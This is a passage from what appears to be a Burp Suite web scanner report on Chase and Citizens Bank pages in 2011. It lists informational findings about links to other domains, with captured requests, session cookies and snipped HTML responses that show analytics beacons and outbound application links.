<a class="borderButton" href="https://firstapp2.firstmarkservices.com/charterone/consumer/">Apply now</a>
...[SNIP]...
<p>
<a class="borderButton" href="https://firstapp2.firstmarkservices.com/charterone/consumer/">Apply now</a>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcst1s1qz00000s5jw3dagrbs_7i7l/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.70. https://www.chase.com/auto-loan/car-loan.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /auto-loan/car-loan.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /auto-loan/car-loan.htm?offercode=CO00120000 HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:35 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...
<a href='http://www.omniture.com' title='Web Analytics'><img
src='https://102.112.2O7.net/b/ss/jpmcedufincauto/1/H.20.3--NS/0'
height='1' width='1' border='0' alt='' />
</a>
...[SNIP]...

16.71. https://www.chase.com/ccp/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /ccp/index.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ccp/index.jsp?pg_name=ccpmapp/privacy_security/protection/page/privacy_policy HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:36 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=2KtTNJXGn1hvy7XNCKpDSKY1kT9lz0pynbNTtvbLypvtlw4Jrdqy!2074473016; path=/
Connection: close


<html LANG="EN" >


<head>


<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/content.css'/>
<script language='Javas
...[SNIP]...
</span><A href="https://careers.jpmorganchase.com/cm/cs?pagename=Chase/Href&urlname=jpmc/careers" class="footerLink">Careers</A>
...[SNIP]...

16.72. https://www.chase.com/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.chase.com
Path:   /index.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /index.jsp?pg_name=ccpmapp/privacy_security/fraud/page/report_fraud HTTP/1.1
Host: www.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mvt_experience=OUT_MVT; v1st=60B8BEB245ABF79;

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:16:34 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=ZdKgNJXC95pk6d7psPy260n66QTy1jdTGryGY6GQGDG5Qv2n2vlQ!1262409899; path=/
Connection: close


<html LANG="EN" >


<head>


<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/content.css'/>
<script language='Javas
...[SNIP]...
</span><A href="https://careers.jpmorganchase.com/cm/cs?pagename=Chase/Href&urlname=jpmc/careers" class="footerLink">Careers</A>
...[SNIP]...

16.73. http://www.chasemilitary.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chasemilitary.com
Path:   /Default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Default.aspx?ada=true HTTP/1.1
Host: www.chasemilitary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ARPT=OVMPLYSilkbyCKKWU; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.2.10.1296685136; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 65726
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 01:06:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv
...[SNIP]...
<div class="feature-credit-image-center">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61YX&PROMO=DF01&SPID=D6CG' target="newWin" class="more-info-credit-1">
<img src="http://www.chasemilitary.com/credit-card-images/1-chase-military-platinum.png" alt="Chase Military Platinum MasterCard" />
...[SNIP]...
<div class="feature-credit-image-center">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61YY&PROMO=DF01&SPID=D67T' target="newWin" class="more-info-credit-2">
<img src="http://www.chasemilitary.com/credit-card-images/2-chase-airforce.png" alt="Air Force Club Platinum MasterCard" />
...[SNIP]...
<div class="feature-credit-image-center">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61YZ&PROMO=DF01&SPID=D67V' target="newWin" class="more-info-credit-2">
<img src="http://www.chasemilitary.com/credit-card-images/3-chase-airforce.png" alt="Air Force Association Platinum MasterCard" />
...[SNIP]...
<div class="feature-credit-image-center">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZB&PROMO=DF01&SPID=D6CF' target="newWin" class="more-info-credit-3">
<img src="http://www.chasemilitary.com/credit-card-images/4-usarmy.png" alt="Army MWR Platinum MasterCard" />
...[SNIP]...
<div class="feature-credit-image-center">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZC&PROMO=DF01&SPID=D67Z' target="newWin" class="more-info-credit-4">
<img src="http://www.chasemilitary.com/credit-card-images/5-marines.png" alt="Marine Corps Platinum MasterCard" />
...[SNIP]...
<div class="feature-credit-image-center">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZD&PROMO=DF01&SPID=D67Y' target="newWin" class="more-info-credit-5">
<img src="http://www.chasemilitary.com/credit-card-images/6-navy.png" alt="Navy MWR Platinum MasterCard" />
...[SNIP]...
<div class="feature-credit-image-center">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZF&PROMO=DF01&SPID=D6DB' target="newWin" class="more-info-credit-5">
<img src="http://www.chasemilitary.com/credit-card-images/7-navy.png" alt="USNA Alumni Association Platinum MasterCard" />
...[SNIP]...
<div class="credit-card-offer-left-a">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61YX&PROMO=DF01&SPID=D6CG' target="newWin">
<img src="http://www.chasemilitary.com/credit-card-images/1-chase-military-platinum.png" alt="Chase Military Platinum MasterCard" />
...[SNIP]...
<div class="credit-links-nospace">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61YX&PROMO=DF01&SPID=D6CG' target="newWin">Learn more</a>
...[SNIP]...
<div class="credit-card-offer-left-b">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61YY&PROMO=DF01&SPID=D67T' target="newWin">
<img src="http://www.chasemilitary.com/credit-card-images/2-chase-airforce.png" alt="Air Force Club Platinum MasterCard" />
...[SNIP]...
<br />
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61YZ&PROMO=DF01&SPID=D67V' target="newWin">
<img src="http://www.chasemilitary.com/credit-card-images/3-chase-airforce.png" alt="Air Force Association Platinum MasterCard" />
...[SNIP]...
<div class="credit-links-nospace">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61YY&PROMO=DF01&SPID=D67T' target="newWin">Learn more</a>
...[SNIP]...
<div class="credit-links-nospace">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61YZ&PROMO=DF01&SPID=D67V' target="newWin">Learn more</a>
...[SNIP]...
<div class="credit-card-offer-left-a">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZB&PROMO=DF01&SPID=D6CF' target="newWin">
<img src="http://www.chasemilitary.com/credit-card-images/4-usarmy.png" alt="Army MWR Platinum MasterCard" />
...[SNIP]...
<div class="credit-links-nospace">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZB&PROMO=DF01&SPID=D6CF' target="newWin">Learn more</a>
...[SNIP]...
<div class="credit-card-offer-left-a">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZC&PROMO=DF01&SPID=D67Z' target="newWin">
<img src="http://www.chasemilitary.com/credit-card-images/5-marines.png" alt="US Marine Corps Platinum MasterCard" />
...[SNIP]...
<div class="credit-links-nospace">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZC&PROMO=DF01&SPID=D67Z' target="newWin">Learn more</a>
...[SNIP]...
<div class="credit-card-offer-left-b">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZD&PROMO=DF01&SPID=D67Y' target="newWin">
<img src="http://www.chasemilitary.com/credit-card-images/6-navy.png" alt="Navy MWR Platinum MasterCard" />
...[SNIP]...
<br />
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZF&PROMO=DF01&SPID=D6DB' target="newWin">
<img src="http://www.chasemilitary.com/credit-card-images/7-navy.png" alt="US Naval Academy Alumni Association Platinum MasterCard" />
...[SNIP]...
<div class="credit-links-nospace">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZD&PROMO=DF01&SPID=D67Y' target="newWin">Learn more</a>
...[SNIP]...
<div class="credit-links-nospace">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZF&PROMO=DF01&SPID=D6DB' target="newWin">Learn more</a>
...[SNIP]...
<div class="cards-panel-1-left">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61YY&PROMO=DF01&SPID=D67T' target="newWin">
<img src="http://www.chasemilitary.com/credit-card-images/small-airforce.gif" alt="U.S. Air Force" />
...[SNIP]...
<div class="cards-panel-1-left">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZB&PROMO=DF01&SPID=D6CF' target="newWin">
<img src="http://www.chasemilitary.com/credit-card-images/small-army.gif" alt="U.S. Army" />
...[SNIP]...
<div class="cards-panel-1-left">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZC&PROMO=DF01&SPID=D67Z' target="newWin">
<img src="http://www.chasemilitary.com/credit-card-images/small-marine.gif" alt="U.S. Marine Corps" />
...[SNIP]...
<div class="cards-panel-1-left">
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61ZD&PROMO=DF01&SPID=D67Y' target="newWin">
<img src="http://www.chasemilitary.com/credit-card-images/small-navy.gif" alt="U.S. Navy" />
...[SNIP]...
</div>
<a href='https://applynow.chase.com/FlexAppWeb/renderApp.do?CELL=61YX&PROMO=DF01&SPID=D6CG' target="newWin"><img src="http://www.chasemilitary.com/credit-card-images/small-military-platinum.gif" alt="Chase Military Platinum MasterCard" />
...[SNIP]...
<div id="feature-mortgage-seesavings">
<a href='http://mortgage.chase.com/pages/purchase/ptools_landing.jsp' target="newWin">
<img src="http://www.chasemilitary.com/graphic_assets/mortgage-see-savings-tab.png" alt="SEE YOUR SAVINGS" />
...[SNIP]...
<div id="feature-mortgage-getstartednow">
<a href='https://www.chase.com/MilitaryLendingProgram' target="newWin">
<img src="http://www.chasemilitary.com/graphic_assets/mortgage-getstarted-tab.png" alt="GET STARTED NOW" />
...[SNIP]...
<br />
<a href='https://www.chase.com/MilitaryLendingProgram' target="newWin" id="startsavingmortgage-alt">
Start saving</a>
...[SNIP]...
<div id="feature-icons-a">
<a href='https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/shared/marketing/page/exclusives_home_equity_offer' target="newWin">
<img src="http://www.chasemilitary.com/images/banking-icons/HomeEquity-out.gif" class="hover" alt="Home Equity Lines" />
...[SNIP]...
<div id="feature-icons-b">
<a href='https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/shared/marketing/page/exclusives_auto_offer' target="newWin">
<img src="http://www.chasemilitary.com/images/banking-icons/AutoLoans-out.gif" class="hover" alt="Auto Loans" />
...[SNIP]...
<div id="feature-icons-c">
<a href='https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/shared/marketing/page/exclusives_investments_offer' target="newWin">
<img src="http://www.chasemilitary.com/images/banking-icons/Investments-out.gif" class="hover" alt="Investments" />
...[SNIP]...
<div id="feature-icons-d">
<a href='https://www.chase.com/index.jsp?pg_name=ccpmapp/individuals/shared/page/exclusives_cds_offer' target="newWin">
<img src="http://www.chasemilitary.com/images/banking-icons/CDs-out.gif" class="hover" alt="Certificates of Deposit" />
...[SNIP]...
<div id="feature-icons-e">
<a href='https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/individuals/checking/page/Get-a-Chase-Checking-Account' target="newWin">
<img src="http://www.chasemilitary.com/images/banking-exclusives-icon.png" class="hover" alt="CHASE EXCLUSIVES(R) - To learn more and apply for a Chase checking accoun
...[SNIP]...
<div id="legal-footer">
<a href="http://www.chase.com">Chase.com</a> | <a href="http://www.jpmorganchase.com/corporate/Home/home.htm">
About Us</a> | <a href="https://www.chase.com/index.jsp?pg_name=ccpmapp/shared/assets/page/accessibility_at_Chase">
Accessibility</a> |
<a href="https://www.chase.com/index.jsp?pg_name=ccpmapp/privacy_security/protection/page/privacy_policy">
Privacy Policy</a> | <a href="https://www.chase.com/index.jsp?pg_name=ccpmapp/shared/assets/page/terms">
Terms of Use</a> | <a href="https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/shared/assets/page/contactus">
Contact Us</a> | <a href="https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/privacy_security/protection/page/security_home">
Security</a> | <a href="http://careers.jpmorganchase.com/career/careerhome">Careers</a>
...[SNIP]...

16.74. http://www.citizensbank.com/checking/gold-banking-package.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /checking/gold-banking-package.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /checking/gold-banking-package.aspx?WT.ac=circlegoldmoneymarket HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:04 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 53422


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<li class=''><a href="https://www.citizensbankonline.com">Login to Online Banking</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=citgoldb;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcssdhxcq00000008yjgz9rbs_9d3h/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.75. http://www.citizensbank.com/greensense/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /greensense/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /greensense/?WT.ac=greensense HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:26:52 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <h
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1791096;type=green08;cat=greenhp;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcssdhxcq00000008yjgz9rbs_9d3h/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>

<!-- *** CLICK TRACKING CODE 3.0 *** -->
<script language="JavaScript" type="text/javascript" defer="1" src="https://tracking.keywordmax.com/tracking/show.php?id=507865640&blockengines=WS&location=Homepage"></script>
<noscript>
<img src="https://tracking.keywordmax.com/tracking/log.php?id=507865640&blockengines=WS&loc=Homepage" border="0" width="1" height="1">
</noscript>
...[SNIP]...

16.76. http://www.citizensbank.com/moneyhelp/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /moneyhelp/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /moneyhelp/?WT.ac=moneyhelp HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:26:39 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcssdhxcq00000008yjgz9rbs_9d3h/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.77. http://www.citizensbank.com/mortgages/home-refinance.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /mortgages/home-refinance.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mortgages/home-refinance.aspx?WT.ac=refinance HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:32 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 20706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<li ><a href="https://citizensbankri.mortgagewebcenter.com/ApplyNow/Application.asp?PID=1" >Act Now</a>
...[SNIP]...
<li><a href="https://citizensbankri.mortgagewebcenter.com/ApplyNow/Application.asp?PID=1">Act now</a>
...[SNIP]...
<li ><a href="https://citizensbankri.mortgagewebcenter.com/ApplyNow/Application.asp?PID=1" >Act now and submit your information online</a>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcssdhxcq00000008yjgz9rbs_9d3h/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.78. http://www.citizensbank.com/savings-and-cds/college-saver.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /savings-and-cds/college-saver.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /savings-and-cds/college-saver.aspx?WT.ac=collegesaver HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:21:57 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 36569


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<li class=''><a href="https://www.citizensbankonline.com">Login to Online Banking</a>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcssdhxcq00000008yjgz9rbs_9d3h/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.79. http://www.citizensbank.com/savings-and-cds/goaltrack-savings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /savings-and-cds/goaltrack-savings.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /savings-and-cds/goaltrack-savings.aspx?WT.ac=goaltracksavings HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:12 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 44083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<li class=''><a href="https://www.citizensbankonline.com">Login to Online Banking</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1791096;type=savpropg;cat=gtsprocb;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<noscript>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0" width="374" height="236" id="leaderboard" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<li class="s3"><a href="https://www3.citizensbankonline.com/">Enroll in GoalTrack Savings</a>
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcssdhxcq00000008yjgz9rbs_9d3h/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.80. http://www.citizensbank.com/savings-and-cds/homebuyer-savings.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /savings-and-cds/homebuyer-savings.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /savings-and-cds/homebuyer-savings.aspx?WT.ac=homebuyersavings HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:27:11 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 37399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<li class=''><a href="https://www.citizensbankonline.com">Login to Online Banking</a>
...[SNIP]...
<nobr>&nbsp;<a href="http://content.softvu.com/hosted/citizensbank/HomeSaving_CB.wmv" target="_new"><img src="/images/promos/hb_video.jpg" border="0" align="middle" width="174" height="90" alt="HomeBuyer Savings Video">
...[SNIP]...
<noscript>
   <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcssdhxcq00000008yjgz9rbs_9d3h/njs.gif?dcsuri=/nojavascript&WT.js=No" />
</noscript>
...[SNIP]...

16.81. http://www.citizensbank.com/services/standard-overdraft-practices.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.citizensbank.com
Path:   /services/standard-overdraft-practices.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /services/standard-overdraft-practices.aspx?WT.ac=standardoverdraftpractices HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:17:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:26:58 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 27487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta id="ctl00_obj
...[SNIP]...
<li class=''><a href="https://www.citizensbankonline.com">Login to Online Banking</a>
...[SNIP]...
